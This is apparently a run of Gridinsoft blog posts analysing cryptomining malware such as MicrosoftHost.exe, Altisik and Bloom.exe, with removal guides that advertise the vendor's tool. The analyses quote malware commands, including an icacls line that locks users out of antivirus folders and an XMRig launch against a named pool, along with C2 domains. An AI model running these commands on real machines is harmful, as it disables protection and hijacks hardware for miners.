Almoristics Application (AlmoritsticsService) Overview

This freeloader (also called Almoristics Service) belongs to the family of crypto-mining Trojans that have been making the rounds lately. Think of it as an unwelcome roommate who moved in without permission and is now running a bitcoin mining operation from your living room.

Your first clue that something’s wrong? Your CPU usage shoots through the roof, and your computer starts moving like it’s wading through molasses. The fan noise alone might make you think your laptop is planning to achieve liftoff. Meanwhile, your electricity bill climbs while this uninvited guest mines Monero or other cryptocurrencies for someone else’s wallet.

Technical Details

Almoristics Application is essentially the new kid on the block in a family of similar threats like Altruistics or Alrustiq App. These application hijack your computer’s processing power to mine cryptocurrencies like Monero or Zcash. The attackers pocket the profits while you’re left with the computing equivalent of a car running on fumes.

This malware typically sneaks in disguised within software from sketchy sources – that “free” version of expensive software from a dubious website probably wasn’t such a bargain after all. Once it makes itself at home, the cryptojacking begins, with CPU usage often spiking to a system-crippling 80%.

Beyond just mining, this virus might also modify system settings and create backdoors for even more unwelcome visitors. To avoid detection, it plays dress-up with various aliases like Alrisit, Altisik, or AltrsikApplication – making it trickier for your antivirus to catch.

How Did I Get Infected?

Let’s be honest – Almoristics doesn’t teleport onto your system by magic. The most common infection route is through bundled downloads – it hitchhikes alongside “free” software, game mods, or key generators from questionable websites. That moment when you rapidly clicked “Next” during installation without reading the fine print? That’s when you likely invited this resource vampire inside.

Other common infection vectors include spam emails with malicious attachments or deceptive links. Those suspicious “YOU WON’T BELIEVE WHAT HAPPENED NEXT” ads on sketchy websites can also trigger automatic downloads. Outdated software with unpatched vulnerabilities makes infection even easier, which is why Windows 7 and 8 users are particularly vulnerable targets.

How To Remove It?

Getting rid of Almoristics requires a systematic approach since it tends to dig in and resist casual removal attempts. First, boot into Safe Mode with Networking (check out how to get into safe mode here if you need guidance). This limits what processes can run, preventing the malware from overwhelming your system during the cleanup operation.

Next, run a full system scan with a reliable anti-malware program like GridinSoft Anti-Malware, which can detect and remove all the files, folders, and registry keys associated with this trojan virus. The cleanup might take some time if there are numerous infections, but patience pays off when you get your computer performance back.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Real-World Encounters with Almoristics

Reddit users have been sharing their battle stories with this crypto-mining invader, and it’s not pretty. One user reported that Almoristics was chewing through a staggering 95% of their CPU resources, turning their gaming PC into what they described as “an expensive space heater that can’t even run Notepad properly.” Several others noticed their GPUs were also being hijacked, making graphics-intensive tasks nearly impossible.

What makes Almoristics particularly sneaky is its persistence mechanisms. If you simply try to end the task in Task Manager, it’ll often respawn within seconds. Some Reddit users report that the malware creates scheduled tasks and registry autorun entries with random names, making manual removal a frustrating game of whack-a-mole. One technically-savvy user even discovered the malware injecting itself into legitimate Windows processes to avoid detection.

Interestingly, Almoristics seems to have some self-preservation instincts built in. Multiple users have observed that it can detect when Task Manager is opened and temporarily reduce its resource usage to avoid drawing attention. Once you close Task Manager, it ramps back up to full mining capacity. It’s like watching a cockroach play dead when the lights come on, only to scurry away when you turn your back.

This malware variant has also been linked to performance issues beyond mere slowdowns. Several Reddit users mentioned experiencing thermal throttling as their CPUs reached dangerous temperatures, and a few even reported system crashes when their cooling systems couldn’t keep up with the constant 100% load. One particularly unfortunate user claimed their relatively new laptop’s battery life plummeted from 6 hours to less than 45 minutes after infection.

After removal, you’ll notice an immediate performance improvement – your CPU usage will drop back to normal levels, your fans will stop screaming, and your computer will respond like it should. Think of it as evicting that cryptomining squatter who was draining your resources and electricity.

Want to stay protected from future infections? Keep your operating system and software updated, be cautious about what you download and from where, and maintain a healthy suspicion of “too good to be true” offers for free premium software. Remember, in the modern world as in life, if you’re not paying for the product, you might be the product – or in this case, your computer’s processing power might be.

The post Almoristics Application: What It Is & How to Remove Virus Miner appeared first on Gridinsoft Blog.

StaryDobry Delivers XMRig Miner Malware in BeamNG, Garry’s Mod

Cybersecurity researchers have uncovered a massive malware spreading campaign. Coined StaryDobry, it has been targeting gamers by distributing trojanized versions of cracks for popular games. These include Garry’s Mod, BeamNG.drive, and Dyson Sphere Program. All of the weaponized versions were promoted on websites dedicated to unlicensed software and p2p sharing.

The campaign, which started in December 2024 and lasted until late January 2025, primarily targeted users in Germany, Russia, Brazil, Belarus, and Kazakhstan. There are a few posts with malicious distributions still available on the websites, although written in Russian.

The malware was embedded within game installers and spread widely over the holiday season when torrent activity peaks. Once installed, the malware delivered an XMRig cryptominer, exploiting gaming PCs’ high processing power for mining Monero cryptocurrency.

Interestingly, a compromised BeamNG.drive mod was reportedly linked to a breach at Disney in mid-2024. While some believe this was a coincidence rather than a targeted attack, the presence of malware in a mod used within a major corporation, it’s probably a tradition by now. Despite thorough analysis, no direct attribution to a known threat group has been made, though the campaign appears to have Russian-speaking origins.

Technical Details

The infection chain begins in a rather typical manner – with users downloading cracked game installers from p2p networks. These installers contained the legitimate game alongside a hidden malware dropper (unrar.dll). By the way, I have repeatedly mentioned that pirating is not good, I even wrote a separate post about it.

Upon installation, the dropper executed in the background, checking for virtual machines or security tools before proceeding. If no threats were detected, the malware registered itself using regsvr32.exe for persistence. It then collected system information, including OS details, CPU specs, and GPU capabilities. The data was then sent to the command and control (C2) server at pinokino[.]fun.

Payload Deployment

Next, the malware decrypted and installed a secondary loader (MTX64.exe), disguising it as a Windows system file to evade detection. This loader created a scheduled task for persistence and ensured that only systems with at least eight CPU cores would proceed with the crypto mining operation. If the conditions were met, the loader downloaded and launched a modified version of the XMRig miner.

This miner was customized to avoid detection by constructing its configuration internally instead of using traditional arguments. It also continuously monitored system processes, shutting itself down if security tools were detected. Unlike standard XMRig miners, this variant connected to private mining servers rather than public pools, making it harder to track the stolen computational power.

Researchers observed that the malware used extensive evasion techniques. These included file name spoofing, timestamp manipulation, and encrypted communication with C2 servers. The campaign appeared highly opportunistic, leveraging the increased demand for cracked games during the holiday season to infect as many users as possible.

How To Stay Safe

The simplest way to avoid infection is to stay away from pirated software and torrent sites. However, in the case of BeamNG.drive mods, even legitimate users could unknowingly install malware, meaning vigilance is required beyond just avoiding piracy. It’s crucial to verify the source of all software, especially game mods, and to rely on trusted developers.

Users should also monitor system performance, as unexpected slowdowns or high CPU usage may indicate cryptominer activity. To minimize risks, users should employ reputable anti-malware solutions that can detect and block such threats. GridinSoft Anti-Malware is an effective tool for identifying and removing StaryDobry malware. Download it by clicking the banner below and activate the protection right now!

The post StaryDobry Malware Hides in Pirated Games, Deploys XMRig appeared first on Gridinsoft Blog.

What is AlrustiqApp (Alrustiq Service) Process?

AlrustiqApp.exe is a process of a coin miner virus, a program that aims at exploiting your hardware to mine cryptocurrencies. Users say about it appearing in the Task Manager with a remarkable heart or giftbox icon and a processor load of 90-95%. In some menus, it is present as Alrustiq Service, which confuses the users into thinking it is a part of Windows or another legitimate software.

Our team recognized this virus on January 10, 2025. This malicious miner is a part of a large group of similar viruses, all of which use similar naming schemes and disguise. All of them create high CPU load regardless of system configuration, which means even the beefiest systems will be kneeled by that virus.

AlrustiqApp virus creates its folder in C:\Program Files (x86) – a typical placement for its group, yet not usual for other viruses. Its executable file and other elements are stored here; it is theoretically possible to delete it from this directory, but it won’t be that easy. The malware protects itself from user interruption by having constantly running background processes. All of them will restart shall the user try stopping them from the Task Manager.

There is an interesting detail that makes this malware stand out from the others. The first one is that it uses a valid digital certificate, issued for AlrustiqDevMD Group. That certificate the a lot of antiviruses to assume the file is safe; GridinSoft however relies on other signatures and thus detects and removes the file flawlessly.

Users also report spyware infection symptoms along with this virus. That means it is highly possible that AlrustiqApp is distributed along with a selection of other malicious software. And it checks out with the typical spreading ways that Alrustiq virus uses, as it is the same with a number of other malware.

How did I get infected?

There are several infection vectors of AlrustiqApp and similar viruses that we have a record of. One of the key ways of getting into a user machine is through pirated software of different types. Downloaded from questionable websites or P2P networks, they can carry a piece of code that downloads and installs viruses together with the actual app. That is one of the reasons why we heavily recommend avoiding pirated software at all cost.

Another way this malware could have gotten into the system is through software bundles. The process is somewhat similar to one with pirated apps, yet this time the threat may be sitting in a freeware program. During the installation, one clicks through a number of windows that ask to “proceed with standard installation”. The catch is exactly there: one of these windows asks to confirm the installation of AlrustiqApp.

How to Remove AlrustiqApp.exe Virus?

To remove the AlrustiqApp virus, I recommend scanning your computer with GridinSoft Anti-Malware. Its advanced detection system will easily identify and eliminate the annoying virus from your computer, ensuring that no other malware remains active.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Step 1. Switching to the Safe Mode with Networking

The step to do first is rebooting your computer in Safe Mode with Networking. That way, you disable AlrustiqApp virus from starting upon the system starup. For this, press “Start”, hold the “Shift” key, and select “Restart”. A system recovery screen will appear, with a selection of boot options.

Here, go to Advanced Options → Startup Settings, and press the button number that is next to “Enable Safe Mode with Networking” (it changes from one system build to another).

Step 2. Remove the AlrustiqApp.exe Virus

After loading into Safe Mode with Networking, you are all set to proceed with the removal. Install GridinSoft Anti-Malware, and run a Full Scan to check the most remote corners of the system. This ensures that no malware will be left undetected. After the scan is finished, click the Clean Now button to delete all the malware. Reboot the system to get back to normal Windows mode.

Don’t miss out on a 6-day free trial option! It will allow you to get a full protection of your PC and test all the features that GridinSoft has. No card required: just type in your email and you will get the trial code.

The post AlrustiqApp.exe Virus (Alrustiq Service) appeared first on Gridinsoft Blog.

What is Unsecapp.exe?

Unsecapp.exe is a process related to the built-in Windows Management Instrumentation (WMI) subsystem, a part of pretty much every Windows installation. It is required to orchestrate applications’ access to operating system resources, and this specific process is responsible for providing the apps with an interface to receive WMI responses.

In normal situations, Unsecapp.exe starts together with the system, but does not show up in the Task Manager until a certain app starts using WMI calls, forcing the process to start running actively.

Some malicious programs may leverage WMI functionality, consequently using the Unsecapp.exe process for their own needs. However, users will likely see a different picture: the malware hiding under the guise of a system process.

Is Unsecapp.exe process a virus?

In normal situations, Unsecapp.exe is no threat to the system and the user. It is located in the C:\Windows\System32 folder, and has all the certificates needed to identify it as a system file. To check whether the process you’re seeing in the Task Manager is legit, click it with the right mouse button and choose “Open file location”.

This will throw you to a place where the source file is located. If it is anything but the said System32 folder, you are likely dealing with a malicious impostor.

Despite being of a benign nature, the name of this process may be used by malware to hide among other genuine processes. It is possible for malware to abuse the process for its purposes, but most often we are talking about hijacking the name. In that case, you may notice Unsecapp.exe causing high CPU load, and being listed among user processes rather than system ones.

In our analysis, the vast majority of fake Unsecapp.exe instances belong to coin miner malware. Such viruses exploit CPU calculation power to mine cryptocurrencies. Yet this is not only about overloading the system: the malware does a lot of tweaking with system settings, which can cause a lot of troubles.

To facilitate its communications with mining pools, it changes system firewall settings, disabling the restrictions for the malicious URL. In order to provide itself with max privileges and make it harder for the user to stop it, the virus modifies a huge amount of registry keys. All these changes may lead to Internet connection problems or system instability, if not removed properly.

Should I Delete Unsecapp.exe?

If you observe Unsecapp.exe occasionally appearing in the Task Manager, without any excessive consumption of system resources, then you should not remove it, as you are seeing the legit process. Deleting it may crumble the functionality of many programs that rely on it.

However, when you see the anomalous behavior, like high CPU consumption, and file location that is away from Windows\System32, then it is time to worry. Removing malware that imposes a system process requires using advanced security software. GridinSoft Anti-Malware will get you covered for this case: download it by clicking the banner below, and follow the instructions.

Before removing the threat, one should switch Windows into Safe Mode with Networking. By doing so, you stop the malware from automatically starting together with the system. The continuous load it creates makes it impossible for other software to run properly.

To boot into Safe Mode with Networking, click the Windows button and go for the Reboot option, while simultaneously holding the Shift button. This initiates the launch of the system recovery screen.

In the menu, go to Advanced Options → Startup Settings, and press the button number that is next to “Enable Safe Mode with Networking” (it may change from one system build to another).

Step 2. Remove the MicrosoftHost.exe Virus

Once in the Safe Mode, you are free from the overhead created by the miner virus. Install and run GridinSoft Anti-Malware; pick Full Scan option to make the program check even the most remote corners of the system. After the scanning process, click the Clean Now button to remove all the detected elements.

After that, simply reboot the computer to make it back to normal Windows boot. The system should be as good as new, without any strange processes popping up in the Task Manager.

The post What is Unsecapp.exe and Should I Remove It? appeared first on Gridinsoft Blog.

MicrosoftHost.exe Overview

MicrosoftHost.exe is malware masquerading as a Windows system process. Despite the rather convincing name, this process doesn’t belong to Windows system processes. The main purpose of this virus is to utilize your computer’s resources to mine cryptocurrency for attackers. For the user, it only results in a significant load on the system and makes it inoperable.

This process falls into the category of cryptocurrency miner viruses. These programs use computing power to mine Monero or other anonymous currencies. Miners typically do not corrupt user files, which is a slight relief. However, in addition to significantly degrading system performance, MicrosoftHost.exe prevents the installation of anti-malware, which I will discuss next.

Like most similar threats, MicrosoftHost.exe is mostly distributed via applications downloaded from unreliable sources. Users, eager to get free access to paid software, download such files without a drop of doubt, disable system protection during their installation, unaware of the embedded malicious code.

Signs of MicrosoftHost.exe infection are fairly obvious. You may notice CPU constantly running at 80-100% even in idle state, when the system does not have any apps running. Such a continuous load is similar to a stress-test, which means an increased risk of overheating and increased wear of PC parts.

Laptop users may see an increased battery discharge when the machine is infected with this virus. Laptops are also designed with much less continuous loads in mind, meaning that their cooling systems are less capable of handling huge amounts of heat. This may lead to even worse wear and even malfunctions.

Detailed Analysis

To understand what we are dealing with, let’s take a closer look at this miner. MicrosoftHost.exe is an XMRig-based miner that is designed to mine Monero. XMRig is a legit open-source coin miner, which is misused by cybercriminals at a massive scale for illegal purposes.

Once the malicious file is executed, several VBS and batch scripts are run that initiate the installation of the miner and the system setup for it. The customization is done by manipulating the registry using the regedit.exe process.

This is a long process that is repeated several times and I won’t go into too much detail about it, but I will still highlight a few things. At some point, MicrosoftHost.exe disables a selection of antivirus software from being launched through PowerShell commands.

The command that the malware uses does a rather simple trick: it changes the user access permissions for the folder of each antivirus program. As a result, one becomes unable to launch the antivirus program.

/c icacls "C:\Program Files\%antivirus_name%" /deny %username%:(OI)(CI)(F)

After all these preparations, the malware with MicrosoftHost.exe executes the following command:

C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1

This command runs the miner itself and gives it specific parameters to follow. Among them are mining pool addresses (loders.xyz) with connection parameters, number of CPU threads to be used in mining and some of the minor internal parameters. All these settings correspond to the “vanilla” XMRig miner.

How To Remove?

The removal process of MicrosoftHost.exe takes several steps, due to the complexity of the infection and changes it does to the system. First, we are going to stop the malware, as it overloads the system and obstructs the normal functioning of antivirus programs. Then, we can switch to deleting the virus

Step 1. Switching to the Safe Mode with Networking

You should begin with rebooting your device in Safe Mode with Networking. To do this, press “Start”, hold the “Shift” key, and select “Restart”. This will send you the Windows Recovery screen, which offers a selection of options.

In the menu, go to Advanced Options → Startup Settings, and press the button number that is next to “Enable Safe Mode with Networking” (it may change from one system build to another).

Step 2. Remove the MicrosoftHost.exe Virus

Once in the Safe Mode, you are free from the overhead created by the miner virus. To remove it completely, consider using GridinSoft Anti-Malware: it will detect and remove even the most evasive malicious program, leave alone minor viruses based off of the open-source one. Download it by clicking the banner below and run a Full scan to check even the most remote areas of the system.

Step 3. Revert the Malicious Changes

When the removal is over, you can proceed with undoing the blockages that the malware has created for antiviruses. You will need to find the paths to each folder of the antivirus program, and paste it at the second place.

C:Windows\Windows\system32\icacls “C:\Program Files\%antivirus_name%” /grant Everyone:(OI)(CI)(F)

Run the command for each antivirus you have installed (excluding GridinSoft, as you’ve installed it after the infection). After that, your system will be as good as new.

The post MicrosoftHost.exe appeared first on Gridinsoft Blog.

Altisik Service Overview

Altisik Service is a malicious coin miner masquerading as a legitimate Windows process. It is used for hidden illegal cryptocurrency mining, thereby creating a significant load on the processor (up to 80% or 100%). However, this miner differs in one key aspect – it registers itself in the system as a service. As a result, hackers ensure their malware’s increased sustainability. Attempts to manually stop or delete the service can lead to critical system failures, potentially causing a “blue screen of death”.

Attackers choose the form of a service for their malware not only for the sake of sustainability. Unlike executable files, services are suspected of malicious activity much less often, simply because users trust them more. Also, Windows services can get higher privileges much more easily, and with less suspicion from security software.

As for the distribution method, users on Reddit report receiving Altisik as an unwanted “bonus” with other software. Miners generally enter systems disguised as bundled software within installers of cracked programs. Another method is through additional malware already present on the computer: vast loader malware botnets can offer huge gains for the operators of malicious coin miners.

Altisik Analysis

Upon execution, Altisik checks for virtual environments and security mechanisms by accessing specific system files and registry keys related to .NET configurations and GPU settings. It pays special attention to Windows Defender settings, especially those concerning real-time protection, by examining related directories and registry entries to potentially disable or bypass these security features. To evade detection, the malware employs stalling tactics with long periods of inactivity, aiming to hinder dynamic analysis and circumvent antivirus sandboxes that might report the file as safe due to lack of immediate activity. These strategies enable Altisik to stealthily operate on infected systems, mining cryptocurrency without user awareness.

Let’s have a closer look at the behavior of the Altisik miner. At the beginning, it is rather typical for a coin miner: upon launching itself, Altisik initially checks for a virtual environment and security mechanisms. Specifically, it checks the following locations:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\Drivers
HKEY_CURRENT_USER\Software\Microsoft\DirectX\UserGpuPreferences

Further, it pays special attention to Windows Defender settings, specifically ones that touch real-time protection. The malware checks the following system sections.

C:\Program Files\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\PassiveMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection

The sample employs stalling tactics, including long periods of inactivity, to hinder dynamic analysis. This also helps with circumventing some of the antivirus sandboxes: seeing no activity, one will report that the file is safe.

Persistence and Privilege Escalation

Altisik miner achieves persistence and elevates its privileges by installing itself as a system service. It executes specific shell commands to run helper processes like AltisikHelper.exe and AltisikHelper.dll, which are designed to prevent users from manually terminating the mining activity. Furthermore, the Altisik creates a DirectInput object to read keystrokes, indicating it captures user input. While it is unlikely that Altisik functions as a keylogger, this input capturing could be used for other purposes, such as monitoring user activity to avoid detection or interference.

Let’s look closer: The miner maintains persistence in the system as a service, which grants it elevated privileges. It executes the following shell commands:

"C:\Windows\system32\rundll32.exe" "C:\Users\\AppData\Local\Temp\AltisikDevPL/AltisikHelper.dll",#1
C:\Windows\system32\SecurityHealthService.exe
C:\Windows\system32\WerFault.exe -u -p 4328 -s 548
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

The AltisikHelper.exe and AltisikHelper.dll processes needed to prevent the user from manually stopping the mining process. Further analysis revealed that the miner creates a DirectInput object, which allows it to read keystrokes. It is unlikely that the Altisik miner can act as a keylogger, but there are quite a few other applications for input capturing.

Network Communication

Altisik uses network communication to send and receive data necessary for its mining operations. The miner communicates with the api.altruistics.org server, likely used for monitoring, control, or data transmission. This may include the miner’s status, statistics, or other mining-related parameters. The response is in text/html format, indicating that the server is returning a web page or text-based data. It also uses Cloudflare DNS 104.18.7.80 and 104.18.6.80, potentially complicating traffic analysis.

How To Remove Altisik?

To get rid of Altisik service, I recommend using GridinSoft Anti-Malware – an effective and easy-to-use antivirus, that will quickly repel any threats present in the system. Though first, I would recommend entering Safe Mode with Networking: go to the Start menu → click Reboot while holding down the Shift button on the keyboard.

When your PC reboots, in the menu that appears after restarting, select “Troubleshoot” → “Advanced options” → “Startup Settings” → “Restart”.

Next, select the Safe Mode with Networking and press the corresponding key (usually F5, though it may vary depending on your Windows version).

Hint: If you have any problems with switching to Safe Mode, please read our guide: How to Remove a Virus From a Computer in Safe Mode.

After switching to the Safe Mode with Networking, follow the steps below:

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Altisik Service Virus Analysis & Removal appeared first on Gridinsoft Blog.

Bloom.exe Miner Overview

Bloom.exe is a process created by coin miner malware. This class of malware exploits the hardware of the victim’s system to mine cryptocurrency. The name “Bloom.exe” serves only to make the malware look as legitimate process and confuse the user. Like malicious miners of this kind, it mines Monero or DarkCoin, with all profits going to the attacker.

The Bloom.exe miner monitors system usage and adjusts its resource consumption accordingly. This makes its less noticeable, as it does not consume all available resources as other miners do. Additionally, Bloom.exe is able to use GPU resources, improving the effectiveness of the mining process, and making it harder to detect the malware activity (if you’re not gaming or don’t pay attention to fan noise levels).

Spreading Methods

As for distribution, Bloom.exe is similar to the other miners. It is mainly distributed under the guise of legitimate software. The second, but almost as popular method is drive-by downloads and illegal software, such as pirated games or cracked programs.

A less effective but no less popular method of distribution is malvertising. Con actors can hijack search results for some popular software, to let the users to their sites instead of genuine ones. And instead of getting the installer of a program, users download and run malware, with Bloom.exe miner being among them.

Technical Analysis

Let’s take a closer look at how this miner behaves. In fact, the majority of miner malware behaves rather similar, regardless of whether they are stand-alone or are based on XMRig or another well-known open-source project.

Traditionally, malware begins its life cycle by checking for a virtual environment, sandbox, or debugging tools. To do this, our sample checks the following registry keys:

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls

These keys contain some system settings and Windows security policies. Besides doing these checks, this malware often has its code packed, encrypted and obfuscated. These “passive” protection measures make Bloom.exe a tough nut for basic antiviruses.

C2 Communication

The malware uses several addresses for communications, including TCP 204.79.197.203:443, which belongs to Microsoft. This is possibly because frauds use some of the cloud services MS offers to anyone. Despite they are easy to take down, it is also easy to create new ones. There are also several addresses that could potentially belong to the command server:

https://pdfcrowd.com/?ref=pdf
https://pdfcrowd.com/doc/api/?ref=pdf
https://gettodaveriviedt0.com/secur3-appleld-verlfy1/?16shop

Payload

After all the checks and communications, the malware drops a payload on the system. It also loads a large number of files into the %windir%\System32\ folder, among which are:

C:\Windows\System32\OHcvDRK.exe
C:\Windows\System32\ROKnunx.exe
C:\Windows\System32\TAtNGGl.exe
C:\Windows\System32\WQDfJPu.exe

These are only a small part of what malware brings to the system; the more time malware is active – the more of these fileswill appear. Inside of these files are either modules that allow for certain functionality, or mining configurations.

How to Remove Bloom.exe?

To effectively remove Bloom.exe, I recommend using GridinSoft Anti-Malware, as it will easily detect and stop any malicious program, including this miner. Contrary to manual removal, this program will find every single element of the malware, ensuring that it won’t come back.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Bloom.exe appeared first on Gridinsoft Blog.

What Is WinRing0x64.sys?

WinRing0x64.sys is a specialized system driver designed to provide applications with direct low-level access to hardware components. This driver operates in Ring 0 (kernel mode) – the most privileged level in the Windows operating system architecture, which explains its name. By bypassing the standard APIs provided by Windows, it allows software to interact directly with hardware for specific functions that require privileged access.

The driver originated from the OpenLibSys project, but various software developers have created their own versions. It’s primarily used for legitimate purposes such as:

• Hardware monitoring (CPU/GPU temperatures, fan speeds)
• Graphics card overclocking
• RGB lighting control for PC components
• System diagnostics and benchmarking
• Advanced power management

When legitimately installed, this driver is typically digitally signed and placed in standard system directories. However, its powerful capabilities make it an attractive target for malware authors who may exploit it or create malicious copies that mimic its functionality.

What Legitimate Software Uses WinRing0x64.sys?

Several reputable software applications rely on WinRing0x64.sys to function properly. If you have any of these programs installed, finding this driver on your system is expected and normal:

Since the algorithm of driver usage is similar to some malware techniques, security software may occasionally flag WinRing0x64.sys as suspicious. This happens because both legitimate tools and malware may need to access hardware directly, making it difficult for security programs to distinguish between benign and malicious usage patterns.

Security Concerns with WinRing0x64.sys

While WinRing0x64.sys is not inherently malicious, its powerful capabilities create potential security vulnerabilities:

• Privileged Access: The kernel-level access that makes this driver useful also makes it dangerous if compromised
• Exploitation Vector: Malware developers can use the driver as an exploitation tool to bypass security measures
• Unsigned Copies: Malicious versions may lack proper digital signatures or use stolen certificates
• Resource Usage: When exploited by malware (especially cryptominers), the driver can facilitate excessive resource consumption

In October 2019, CVE-2019-18845 was issued for a vulnerability in WinRing0.sys (an earlier version of the driver) that could allow attackers to execute code with kernel privileges. This further illustrates why security researchers are cautious about such powerful drivers.

How to Distinguish Between Legitimate and Malicious Instances

Determining whether WinRing0x64.sys on your system is legitimate or malicious requires investigating several factors:

Signs of Legitimate Usage

• You have installed hardware monitoring, overclocking, or RGB lighting software
• The driver is digitally signed by a reputable company
• The file is located in a standard system driver directory or within a known application folder
• System resource usage remains normal
• The driver was installed alongside recognized legitimate software

Red Flags for Malicious Usage

• The driver appeared without installing any related legitimate software
• WinRing0x64.sys is running but you don’t have any hardware monitoring or RGB control applications
• The file lacks a digital signature or has an invalid signature
• Abnormal system resource usage (high CPU, memory, or disk activity)
• The driver is located in an unusual directory
• Security software reports other malware detections alongside it

If you’re unsure about the nature of WinRing0x64.sys on your system, consider these scenarios:

• Scenario 1: You’ve installed EVGA Precision X1 for your graphics card, and WinRing0x64.sys is flagged by your antivirus. This is likely a false positive.
• Scenario 2: You have a basic laptop with integrated graphics, no RGB components, and haven’t installed any monitoring tools, yet WinRing0x64.sys appears in Task Manager. This is suspicious and warrants investigation.

How to Check if WinRing0x64.sys Is Legitimate

To determine if the WinRing0x64.sys on your system is legitimate, follow these steps:

1. Verify File Location: Check where the file is stored. Legitimate versions typically reside in:
   • C:\Windows\System32\drivers\
   • Installation directories of hardware utilities (e.g., C:\Program Files\EVGA Precision X1\)
2. Check Digital Signature: Right-click the file, select Properties, and go to the Digital Signatures tab. Verify that:
   • The file is signed by a recognized publisher
   • The signature is valid and hasn’t expired
3. Review Associated Software: Identify which program installed the driver by checking:
   • Recently installed applications
   • Control Panel > Programs and Features
   • Windows Event Log for recent driver installations
4. Monitor Resource Usage: Keep an eye on system performance when WinRing0x64.sys is running:
   • Open Task Manager to monitor CPU and memory usage
   • Check if related processes are consuming excessive resources

When and How to Remove WinRing0x64.sys

WinRing0x64.sys is not a critical Windows component and can be safely removed if needed. However, removing it directly is not recommended. Instead, you should uninstall the software that installed it, which will properly remove the driver in most cases.

When to Consider Removal

• You’ve confirmed the driver is being used maliciously
• You no longer need the software that installed it
• The driver is causing system instability or conflicts
• You want to reduce potential security risks

Method 1: Remove Associated Software (Recommended)

1. Press Win + I to open Settings
2. Go to Apps > Apps & features
3. Search for and select the software that installed WinRing0x64.sys (e.g., EVGA Precision, Corsair iCUE, CPU-Z)
4. Click Uninstall and follow the prompts
5. Restart your computer to complete the removal process

Method 2: Disable the Driver (Advanced Users)

1. Press Win + R, type “services.msc” and press Enter
2. Search for services related to the driver or associated software
3. Right-click the service and select Properties
4. Change the Startup type to “Disabled”
5. Click Stop to halt the service
6. Click Apply and OK
7. Restart your computer

Method 3: Remove Malicious Instances with Anti-Malware Software

If you suspect that WinRing0x64.sys on your system is malicious or has been exploited, follow these steps to remove it:

1. Boot your computer in Safe Mode with Networking:
   • Press Win + I to open Settings
   • Go to Update & Security > Recovery
   • Under Advanced startup, click Restart now
   • Select Troubleshoot > Advanced options > Startup Settings > Restart
   • After restart, press F5 to select Safe Mode with Networking
2. Download and install GridinSoft Anti-Malware
3. Update the malware definitions
4. Perform a full system scan
5. Allow the software to quarantine and remove detected threats
6. Restart your computer in normal mode
7. Run another scan to ensure all threats have been removed

Prevention Tips and Best Practices

To minimize risks associated with WinRing0x64.sys and similar powerful drivers, follow these best practices:

• Download software only from official sources – Avoid third-party download sites which may bundle malware with legitimate applications
• Keep your operating system and drivers updated – This ensures you have the latest security patches for known vulnerabilities
• Use reputable security software – A good antivirus/anti-malware solution can detect suspicious driver activity
• Check driver signatures – Be wary of unsigned or improperly signed drivers
• Monitor system performance – Unusual resource consumption could indicate exploitation
• Limit privileged software – Only install hardware management tools when necessary
• Regularly audit installed software – Remove applications you no longer use to reduce your attack surface

Conclusion

WinRing0x64.sys itself is not malicious and serves legitimate purposes for hardware monitoring, overclocking, and RGB control software. However, its powerful low-level access makes it a potential target for exploitation by malware authors. By understanding its purpose, recognizing legitimate uses, and knowing how to identify suspicious instances, you can better protect your system.

If you suspect malicious use of WinRing0x64.sys on your system, don’t hesitate to perform a thorough scan with reliable security software. In most cases, proper removal involves uninstalling the associated application rather than attempting to delete the driver file directly.

The post What Is WinRing0x64.sys and Is It Safe to Remove? appeared first on Gridinsoft Blog.

Hellminer malware has a potential to attack a wide range of devices, from IoT to server clusters. The final target of its activity is bringing profit to its masters with the use of your hardware. Ignoring the activity of this malicious program may lead to premature hardware failure and overall performance deterioration.

Modern malware samples often come in packs, meaning that one thing may signify the presence of several others. Do not hesitate with removal: scan your device with GridinSoft Anti-Malware and remove all the threats in one click. Get your system cleaned up.

What is the Hellminer.exe process?

